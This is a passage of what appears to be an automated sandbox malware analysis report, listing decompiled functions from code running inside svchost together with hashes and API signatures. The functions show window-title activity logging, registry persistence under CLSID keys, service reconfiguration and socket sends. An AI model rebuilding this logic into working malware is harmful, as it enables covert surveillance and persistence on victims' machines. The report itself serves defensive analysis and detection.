                                                            				E0000022B22BAF563830( *_t119 + __ebx, 0, _t68, _t69, _t40, L"\r\n\r\n[Title:%s]\r\n[Time:]%d-%d-%d  %d:%d:%d\r\n[Content:]", _t114,  &_v2600);
                                                            				 *_t119 = 0;
                                                            				lstrcatW(??, ??);
                                                            				_t87 =  *0xaf599e30; // 0x0
                                                            				 *_t87 =  *_t87 + __ebx;
                                                            				return E0000022B22BAF55A7C0( *_t119 + __ebx, _t87, _v24 ^ _t124 - 0x00000a80);
                                                            			}
                                                            0x22baf53d623
                                                            0x22baf53d629
                                                            0x22baf53d634
                                                            0x22baf53d63b
                                                            0x22baf53d63e
                                                            0x22baf53d646
                                                            0x22baf53d64a
                                                            0x22baf53d64d
                                                            0x22baf53d651
                                                            0x22baf53d668
                                                            0x22baf53d66d
                                                            0x22baf53d673
                                                            0x22baf53d67b
                                                            0x22baf53d681
                                                            0x22baf53d68f
                                                            0x22baf53d694
                                                            0x22baf53d69a
                                                            0x22baf53d6a1
                                                            0x22baf53d6a6
                                                            0x22baf53d6aa
                                                            0x22baf53d6ac
                                                            0x22baf53d6ac
                                                            0x22baf53d6c3
                                                            0x22baf53d6ca
                                                            0x22baf53d6d2
                                                            0x22baf53d6d6
                                                            0x22baf53d6e4
                                                            0x22baf53d6e7
                                                            0x22baf53d6ec
                                                            0x22baf53d6f0
                                                            0x22baf53d6f3
                                                            0x22baf53d6fe
                                                            0x22baf53d700
                                                            0x22baf53d710
                                                            0x22baf53d718
                                                            0x22baf53d71d
                                                            0x22baf53d72d
                                                            0x22baf53d733
                                                            0x22baf53d73d
                                                            0x22baf53d74d
                                                            0x22baf53d758
                                                            0x22baf53d75e
                                                            0x22baf53d764
                                                            0x22baf53d768
                                                            0x22baf53d774
                                                            0x22baf53d77f
                                                            0x22baf53d789
                                                            0x22baf53d78e
                                                            0x22baf53d79c
                                                            0x22baf53d7a1
                                                            0x22baf53d7af
                                                            0x22baf53d7b4
                                                            0x22baf53d7b9
                                                            0x22baf53d7ca
                                                            0x22baf53d7cc
                                                            0x22baf53d7d5
                                                            0x22baf53d7db
                                                            0x22baf53d7e0
                                                            0x22baf53d7f0
                                                            0x22baf53d7f6
                                                            0x22baf53d805
                                                            0x22baf53d82f

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$ForegroundLocalTextTimelstrcatwsprintf
                                                            • String ID: [Title:%s][Time:]%d-%d-%d %d:%d:%d[Content:]
                                                            • API String ID: 67575802-2837871436
                                                            • Opcode ID: 69e9fd58b96e4f3d4d3854af24b79439bf4c14fd42c8887bbbade52ff94f1acd
                                                            • Instruction ID: 7ff3c3c6744c53a91c14f4cf279d73229a01ff78d6a4f145791e3b8beb2b99dd
                                                            • Opcode Fuzzy Hash: 69e9fd58b96e4f3d4d3854af24b79439bf4c14fd42c8887bbbade52ff94f1acd
                                                            • Instruction Fuzzy Hash: E2518E33604B94A6EB758F95E0583EAB3B1F385B50F444211DA9A03B9ADF7EC415CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerSizeWrite
                                                            • String ID:
                                                            • API String ID: 1886887421-3916222277
                                                            • Opcode ID: d224db8499f9ce0f67bf050c4578c36161d58d33bc40e1a247dc001eab747ad5
                                                            • Instruction ID: 52d4ae5a1a928f0a0788c20e30e321076494ff5a6fcdfa21b642a6058b5ffc4a
                                                            • Opcode Fuzzy Hash: d224db8499f9ce0f67bf050c4578c36161d58d33bc40e1a247dc001eab747ad5
                                                            • Instruction Fuzzy Hash: B5414423710A84A6FF228F69E46C7AA7760F794B98F548324DE4A43B96DF3EC145C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalSection$EnterLeaveSleepclosesockethtonssendtosocket
                                                            • String ID:
                                                            • API String ID: 920770778-0
                                                            • Opcode ID: 5350461786bff152b63b3b2c8cad6893e4e9ffaf9b45ddaf88dfe0b0133d58e1
                                                            • Instruction ID: 9cbee46d7a5e1670a11a71fb20c4ac8e686de340817591b1390bed821fe73b53
                                                            • Opcode Fuzzy Hash: 5350461786bff152b63b3b2c8cad6893e4e9ffaf9b45ddaf88dfe0b0133d58e1
                                                            • Instruction Fuzzy Hash: 8A41AB33210684A7EB31CF65E46839EB7B1F784B44F544105DA8A47BAADF3AD896CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Object$CreateDeleteSectionSelect
                                                            • String ID:
                                                            • API String ID: 3188413882-3916222277
                                                            • Opcode ID: 0f7374a2714653dd941a78a046297790ff33184f52ad4544f62458838381129a
                                                            • Instruction ID: c22b5e5beb4f46e9f1059accaa68350bdc60167859244cf4004c6bd362babc32
                                                            • Opcode Fuzzy Hash: 0f7374a2714653dd941a78a046297790ff33184f52ad4544f62458838381129a
                                                            • Instruction Fuzzy Hash: C1411B77614B84CBC750CF29E484699BBA0F789B98F158226EF4D83B29DF39C451CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandlePointerWrite
                                                            • String ID: q$s
                                                            • API String ID: 3604237281-2459310677
                                                            • Opcode ID: ee29e8d2e400fc2b527e0687e6f7e94d409a35ec394128138fbd016ee424c08e
                                                            • Instruction ID: 9aed0f4a014f5c92db75acc98bce37b994a10e7081aeb6930d3c15cec5835f2c
                                                            • Opcode Fuzzy Hash: ee29e8d2e400fc2b527e0687e6f7e94d409a35ec394128138fbd016ee424c08e
                                                            • Instruction Fuzzy Hash: 8031F3736146809AEB20CB55E41C79EBBA0F389BE4F104215EE8807B99DF7EC489CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 67%
                                                            			E0000022B22BAF53FF10(void* __ecx, void* __edx, void* __eflags, char* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                            				void* __rdi;
                                                            				void* __r14;
                                                            				void* __r15;
                                                            				int _t20;
                                                            				void* _t31;
                                                            				void* _t32;
                                                            				char* _t40;
                                                            				long long _t60;
                                                            				void* _t69;
                                                            				void* _t71;
                                                            				char* _t72;
                                                            				void* _t73;
                                                            
                                                            				_t69 = __r8;
                                                            				_t60 = __rsi;
                                                            				_t40 = __rax;
                                                            				_a16 = __rbx;
                                                            				_a24 = __rbp;
                                                            				_t73 = __rcx;
                                                            				E0000022B22BAF53F750(__rsi, __r9, _t71, __rcx);
                                                            				_t72 = _t40;
                                                            				E0000022B22BAF53FC50(__rbx, _t60, __r9, _t72, _t73);
                                                            				if (_t72 == 0) goto 0xaf53ff4b;
                                                            				LocalSize(??);
                                                            				if (_t40 == 0) goto 0xaf53ff5c;
                                                            				LocalSize(??);
                                                            				if (_t40 + _t40 == 0) goto 0xaf53ffe1;
                                                            				_a8 = _t60;
                                                            				LocalAlloc(??, ??);
                                                            				_t61 = _t40;
                                                            				 *_t40 = 0x8e;
                                                            				if (0 == 0) goto 0xaf53ff98;
                                                            				r8d = 0;
                                                            				_t6 = _t40 + 1; // 0x1
                                                            				E0000022B22BAF562BA0(0x40, 0, _t31, _t32, _t6, _t72, _t40, _t40, _t69);
                                                            				LocalFree(??);
                                                            				if (0 == 0) goto 0xaf53ffb8;
                                                            				r8d = 0;
                                                            				E0000022B22BAF562BA0(0, 0, _t31, _t32, _t72 + 1 + _t40, _t40, _t40, _t61, _t69);
                                                            				LocalFree(??);
                                                            				_t20 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t20;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t73 + 8)), _t61);
                                                            				return LocalFree(??);
                                                            			}

                                                            0x22baf53ff10
                                                            0x22baf53ff10
                                                            0x22baf53ff10
                                                            0x22baf53ff10
                                                            0x22baf53ff15
                                                            0x22baf53ff25
                                                            0x22baf53ff2a
                                                            0x22baf53ff2f
                                                            0x22baf53ff32
                                                            0x22baf53ff3d
                                                            0x22baf53ff42
                                                            0x22baf53ff4e
                                                            0x22baf53ff53
                                                            0x22baf53ff61
                                                            0x22baf53ff66
                                                            0x22baf53ff70
                                                            0x22baf53ff76
                                                            0x22baf53ff79
                                                            0x22baf53ff7e
                                                            0x22baf53ff80
                                                            0x22baf53ff83
                                                            0x22baf53ff8a
                                                            0x22baf53ff92
                                                            0x22baf53ff9a
                                                            0x22baf53ffa4
                                                            0x22baf53ffaa
                                                            0x22baf53ffb2
                                                            0x22baf53ffbb
                                                            0x22baf53ffc5
                                                            0x22baf53ffc8
                                                            0x22baf53ffce
                                                            0x22baf53fff4

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$FreeSize$AddressLibraryLoadProc$Alloc
                                                            • String ID:
                                                            • API String ID: 111737154-0
                                                            • Opcode ID: 4172108d635db459362c6864aa8768446e46ac8b2ddb719c3c2b30b8a576c1fc
                                                            • Instruction ID: a966246fa67ce896ead80958b936fdb6bb6d77cf8109fb3406ad4aff1ebffb36
                                                            • Opcode Fuzzy Hash: 4172108d635db459362c6864aa8768446e46ac8b2ddb719c3c2b30b8a576c1fc
                                                            • Instruction Fuzzy Hash: B7210B27305A5066EE26AFD7A42C3EAB390F789FC0F480524DE1A07757DF3AC0064780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressCloseLibraryLoadOpenProc
                                                            • String ID: Advapi32.dll$RegRenameKey
                                                            • API String ID: 2178542278-2310806928
                                                            • Opcode ID: c47923858d9d37e0adf9b7ba642ea88ff25cc01d58de8711dbd89c8daadbd35d
                                                            • Instruction ID: d3c809649d6e8bdb8591e4accae0c304604d08163e3bbca6c25e0a43f219119b
                                                            • Opcode Fuzzy Hash: c47923858d9d37e0adf9b7ba642ea88ff25cc01d58de8711dbd89c8daadbd35d
                                                            • Instruction Fuzzy Hash: 3F119173715B50A6EE519F57F84C696B3A1F784FD0F084025EE8943B69DF39C0468B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F5F(void* __rax, long long __rbx, long long _a176) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t19;
                                                            				void* _t21;
                                                            				void* _t26;
                                                            				void* _t27;
                                                            				void* _t28;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t19);
                                                            				goto 0xaf546b40;
                                                            				_a176 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t19, _t21, _t26, _t27, _t28);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t19 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}

                                                            0x22baf545f5f
                                                            0x22baf545f6d
                                                            0x22baf545f6e
                                                            0x22baf545f73
                                                            0x22baf545f78
                                                            0x22baf545f83
                                                            0x22baf545f88
                                                            0x22baf545f92
                                                            0x22baf545f95
                                                            0x22baf545f9b
                                                            0x22baf545fb3

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                            • String ID:
                                                            • API String ID: 2762133943-0
                                                            • Opcode ID: 29167c6bc474538600a62a10073a99064300952de0cbeae73f2b8a0282cc91a0
                                                            • Instruction ID: 6475bd064a81df975ac39311e93c400f41d12fd11bd9b8dc9fae30b2c1c1467d
                                                            • Opcode Fuzzy Hash: 29167c6bc474538600a62a10073a99064300952de0cbeae73f2b8a0282cc91a0
                                                            • Instruction Fuzzy Hash: D7117232704B80D2EB258F66B81C25AB7E5FB88BC0F084524DE9A07B5ADF3DC0558B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF545F55(void* __rax, long long __rbx, long long _a232) {
                                                            				int _t5;
                                                            				void* _t9;
                                                            				void* _t16;
                                                            				void* _t20;
                                                            				void* _t22;
                                                            				void* _t28;
                                                            				void* _t29;
                                                            				void* _t30;
                                                            
                                                            				_t9 = __rax;
                                                            				_pop(_t20);
                                                            				goto 0xaf546b40;
                                                            				_a232 = __rbx;
                                                            				E0000022B22BAF545FD0(_t16, _t20, _t22, _t28, _t29, _t30);
                                                            				if (_t9 == 0) goto 0xaf545fa9;
                                                            				_t5 = LocalSize(??);
                                                            				r9b = 0x3f;
                                                            				r8d = _t5;
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t20 + 8)), _t9);
                                                            				return LocalFree(??);
                                                            			}

                                                            0x22baf545f55
                                                            0x22baf545f6d
                                                            0x22baf545f6e
                                                            0x22baf545f73
                                                            0x22baf545f78
                                                            0x22baf545f83
                                                            0x22baf545f88
                                                            0x22baf545f92
                                                            0x22baf545f95
                                                            0x22baf545f9b
                                                            0x22baf545fb3

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Service$CloseDatabaseHandleOpen$ChangeConfigLockManagerUnlock
                                                            • String ID:
                                                            • API String ID: 2762133943-0
                                                            • Opcode ID: 4358572366bedb1f0e23307840933bb83ae960f857adb464ce6cee077f71c3e1
                                                            • Instruction ID: 452d83a643f407a3fe11a0f9329b347bcc3117e7aa60c69878dfd2fef11b96af
                                                            • Opcode Fuzzy Hash: 4358572366bedb1f0e23307840933bb83ae960f857adb464ce6cee077f71c3e1
                                                            • Instruction Fuzzy Hash: AA114232714B80D2EF258F66B81C25AB7A5FB88BD0F184524DE9A07B59EF3DD0558B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 39%
                                                            			E0000022B22BAF54A4A0(void* __eflags) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				void* _v648;
                                                            				char _v656;
                                                            				char _v660;
                                                            				char _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				void* __rbx;
                                                            				void* _t33;
                                                            				void* _t36;
                                                            				void* _t37;
                                                            				signed long long _t43;
                                                            				long long _t48;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				signed long long _t63;
                                                            
                                                            				_t43 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v24 = _t43 ^ _t63;
                                                            				_v660 = 4;
                                                            				_v664 = 0;
                                                            				E0000022B22BAF549800(_t48, L"SEOID",  &_v632, _t62);
                                                            				wsprintfW(??, ??);
                                                            				r8d = _v660;
                                                            				E0000022B22BAF563830(_t33, 0, _t36, _t37,  &_v664, L"SOFTWARE\\Classes\\CLSID\\%s", _t61,  &_v632);
                                                            				_v656 = _t48;
                                                            				r9d = 0x20119;
                                                            				_v680 =  &_v656;
                                                            				r8d = 0;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf54a583;
                                                            				_v672 =  &_v660;
                                                            				r8d = 0;
                                                            				_v680 =  &_v664;
                                                            				RegQueryValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t32 =  ==  ? 1 : 0;
                                                            				RegCloseKey(??);
                                                            				_t41 =  ==  ? 1 : 0;
                                                            				if (( ==  ? 1 : 0) == 0) goto 0xaf54a583;
                                                            				goto 0xaf54a585;
                                                            				return E0000022B22BAF55A7C0(1,  &_v664, _v24 ^ _t63);
                                                            			}

                                                            0x22baf54a4a9
                                                            0x22baf54a4b3
                                                            0x22baf54a4bd
                                                            0x22baf54a4ca
                                                            0x22baf54a4d5
                                                            0x22baf54a4ee
                                                            0x22baf54a4f4
                                                            0x22baf54a500
                                                            0x22baf54a50a
                                                            0x22baf54a50f
                                                            0x22baf54a515
                                                            0x22baf54a51a
                                                            0x22baf54a534
                                                            0x22baf54a540
                                                            0x22baf54a54f
                                                            0x22baf54a559
                                                            0x22baf54a55e
                                                            0x22baf54a56b
                                                            0x22baf54a573
                                                            0x22baf54a579
                                                            0x22baf54a57b
                                                            0x22baf54a581
                                                            0x22baf54a59d

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue$wsprintf
                                                            • String ID: SEOID$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 3615287298-3437544703
                                                            • Opcode ID: d00070f6c3d7fbc3c3d0d5a92490252bd96c0c821e637285401c2de691e80ab1
                                                            • Instruction ID: 37ced3c1a8d151399c257a643f91ad6c54c2281f567e12f85264a246ce503a85
                                                            • Opcode Fuzzy Hash: d00070f6c3d7fbc3c3d0d5a92490252bd96c0c821e637285401c2de691e80ab1
                                                            • Instruction Fuzzy Hash: 5E216073329B84A6EB61CF91F48D7DAB3A4F784744F801015A69E43A5ADF79C108CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E0000022B22BAF54C2B0(intOrPtr __edx, void* __eflags, long long __rbx, long long __rcx, void* __rdx, long long __rsi, void* __r8, void* __r11, long long _a24, long long _a32) {
                                                            				void* _v8;
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				char _v648;
                                                            				long long _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				intOrPtr _v688;
                                                            				long long _v696;
                                                            				void* _t30;
                                                            				intOrPtr _t36;
                                                            				signed long long _t41;
                                                            				long long _t44;
                                                            				void* _t62;
                                                            				void* _t67;
                                                            
                                                            				_t44 = __rbx;
                                                            				_a24 = __rbx;
                                                            				_a32 = __rsi;
                                                            				_t41 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v24 = _t41 ^ _t62 - 0x000002d0;
                                                            				_t36 = __edx;
                                                            				E0000022B22BAF548BF0(__edx, _t41 ^ _t62 - 0x000002d0, __rbx, __rcx, __rdx, __r8, _t67, __r11);
                                                            				E0000022B22BAF549800(_t44, L"Global",  &_v632, __rsi);
                                                            				wsprintfW(??, ??);
                                                            				_v664 = _t44;
                                                            				_v672 =  &_v648;
                                                            				r9d = 0;
                                                            				_v680 = _t44;
                                                            				r8d = 0;
                                                            				_v688 = 0xf013f;
                                                            				_v696 = 0;
                                                            				_v648 = _t44;
                                                            				if (RegCreateKeyExW(??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf54c386;
                                                            				_t16 = _t44 + 3; // 0x3
                                                            				r9d = _t16;
                                                            				_v688 = _t36;
                                                            				r8d = 0;
                                                            				_v696 = __rcx;
                                                            				RegSetValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t33 =  ==  ? 1 : 0;
                                                            				RegCloseKey(??);
                                                            				_t30 =  ==  ? 1 : 0;
                                                            				return E0000022B22BAF55A7C0(1,  &_v648, _v24 ^ _t62 - 0x000002d0);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1865207932
                                                            • Opcode ID: 7cd9f5dd0876402cf28caf478eede5fb911d9810b5707cfe57c303bab957c3a9
                                                            • Instruction ID: 32d79533764882247eabc50ccf6dd512650de73bab43782e696bcf274acfe424
                                                            • Opcode Fuzzy Hash: 7cd9f5dd0876402cf28caf478eede5fb911d9810b5707cfe57c303bab957c3a9
                                                            • Instruction Fuzzy Hash: BD216933214B84A2EB308FA5F88D78EB7A5F788794F804126AA8D43A19DF79C505CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 31%
                                                            			E0000022B22BAF53C200(long long __rbx, long long __rcx, long long _a16) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				long long _v648;
                                                            				long long _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				intOrPtr _v688;
                                                            				long long _v696;
                                                            				intOrPtr _t36;
                                                            				signed long long _t40;
                                                            				signed long long _t41;
                                                            				signed long long _t42;
                                                            				long long _t44;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				void* _t66;
                                                            				void* _t67;
                                                            
                                                            				_a16 = __rbx;
                                                            				_t40 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t41 = _t40 ^ _t62 - 0x000002d0;
                                                            				_v24 = _t41;
                                                            				E0000022B22BAF549800(__rcx, L"Global",  &_v632, _t61);
                                                            				wsprintfW(??, ??);
                                                            				_t42 = _t41 | 0xffffffff;
                                                            				if ( *((short*)(__rcx + 2 + _t42 * 2)) != 0) goto 0xaf53c251;
                                                            				_t36 = 2 + (_t42 + 1) * 2;
                                                            				E0000022B22BAF548BF0(_t36, _t42 + 1, __rcx, __rcx, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v632, _t66, _t67);
                                                            				_t44 =  &_v648;
                                                            				_v664 = __rcx;
                                                            				_v672 = _t44;
                                                            				r9d = 0;
                                                            				_v680 = __rcx;
                                                            				r8d = 0;
                                                            				_v648 = __rcx;
                                                            				_v688 = 0xf013f;
                                                            				_v696 = 0;
                                                            				if (RegCreateKeyExW(??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf53c2e1;
                                                            				_t21 = _t44 + 3; // 0x3
                                                            				r9d = _t21;
                                                            				_v688 = _t36;
                                                            				r8d = 0;
                                                            				_v696 = __rcx;
                                                            				RegSetValueExW(??, ??, ??, ??, ??, ??);
                                                            				RegCloseKey(??);
                                                            				return E0000022B22BAF55A7C0(0, _t44, _v24 ^ _t62 - 0x000002d0);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseValue$CreateOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 73588525-1865207932
                                                            • Opcode ID: 30ab3177694c33fdf4efd9e3b1b178a5a563e838a76560b53d07659d0998b58c
                                                            • Instruction ID: 71419ffa5f7b44bb0a634aebaa179f00818def66ae09601b19d5a4aa7d19ac33
                                                            • Opcode Fuzzy Hash: 30ab3177694c33fdf4efd9e3b1b178a5a563e838a76560b53d07659d0998b58c
                                                            • Instruction Fuzzy Hash: 63214133214B84A2EB319F94F49D3DEB7A1F784764F405216E6A943B9ADF79C109CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 27%
                                                            			E0000022B22BAF53C0F0(long long __rbx, long long __rcx, long long _a16) {
                                                            				signed int _v24;
                                                            				char _v552;
                                                            				char _v632;
                                                            				long long _v648;
                                                            				long long _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				intOrPtr _v688;
                                                            				long long _v696;
                                                            				intOrPtr _t36;
                                                            				signed long long _t40;
                                                            				signed long long _t41;
                                                            				signed long long _t42;
                                                            				long long _t44;
                                                            				long long _t50;
                                                            				void* _t56;
                                                            				void* _t61;
                                                            				void* _t62;
                                                            				void* _t65;
                                                            				void* _t67;
                                                            				void* _t68;
                                                            
                                                            				_a16 = __rbx;
                                                            				_t40 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t41 = _t40 ^ _t62 - 0x000002d0;
                                                            				_v24 = _t41;
                                                            				_t42 = _t41 | 0xffffffff;
                                                            				asm("o16 nop [eax+eax]");
                                                            				if ( *((short*)(__rcx + 2 + _t42 * 2)) != 0) goto 0xaf53c120;
                                                            				_t36 = 2 + (_t42 + 1) * 2;
                                                            				E0000022B22BAF548BF0(_t36, _t42 + 1, __rcx, __rcx, _t56, _t65, _t67, _t68);
                                                            				E0000022B22BAF549800(__rcx, L"Global",  &_v632, _t61);
                                                            				_t50 =  &_v552;
                                                            				wsprintfW(??, ??);
                                                            				_t44 =  &_v648;
                                                            				_v664 = _t50;
                                                            				_v672 = _t44;
                                                            				r9d = 0;
                                                            				_v680 = _t50;
                                                            				r8d = 0;
                                                            				_v648 = _t50;
                                                            				_v688 = 0xf013f;
                                                            				_v696 = 0;
                                                            				if (RegCreateKeyExW(??, ??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf53c1d8;
                                                            				_t21 = _t44 + 3; // 0x3
                                                            				r9d = _t21;
                                                            				_v688 = _t36;
                                                            				r8d = 0;
                                                            				_v696 = __rcx;
                                                            				RegSetValueExW(??, ??, ??, ??, ??, ??);
                                                            				RegCloseKey(??);
                                                            				return E0000022B22BAF55A7C0(0, _t44, _v24 ^ _t62 - 0x000002d0);
                                                            			}

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValuewsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 4211343355-1865207932
                                                            • Opcode ID: 3625807fb6c510a2baa1aa18e7310167b2fd1ac4eed9e788a5f098aa340f5fa0
                                                            • Instruction ID: b6b88723edeeeea098d93f3bc77a48524c9c4f61c9232c085e38d572b7920fac
                                                            • Opcode Fuzzy Hash: 3625807fb6c510a2baa1aa18e7310167b2fd1ac4eed9e788a5f098aa340f5fa0
                                                            • Instruction Fuzzy Hash: 07214133214B84A2EB219F54F49D3DEB7A1F788764F805215E6A943BA9DF79C109CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Window$LongObject$BitmapBitsCompatibleCreateDeleteSelectVisible
                                                            • String ID:
                                                            • API String ID: 358708372-0
                                                            • Opcode ID: 5313be252f9b7b0df6761ce223440e109078e93a4f508decd9cae49f029374e0
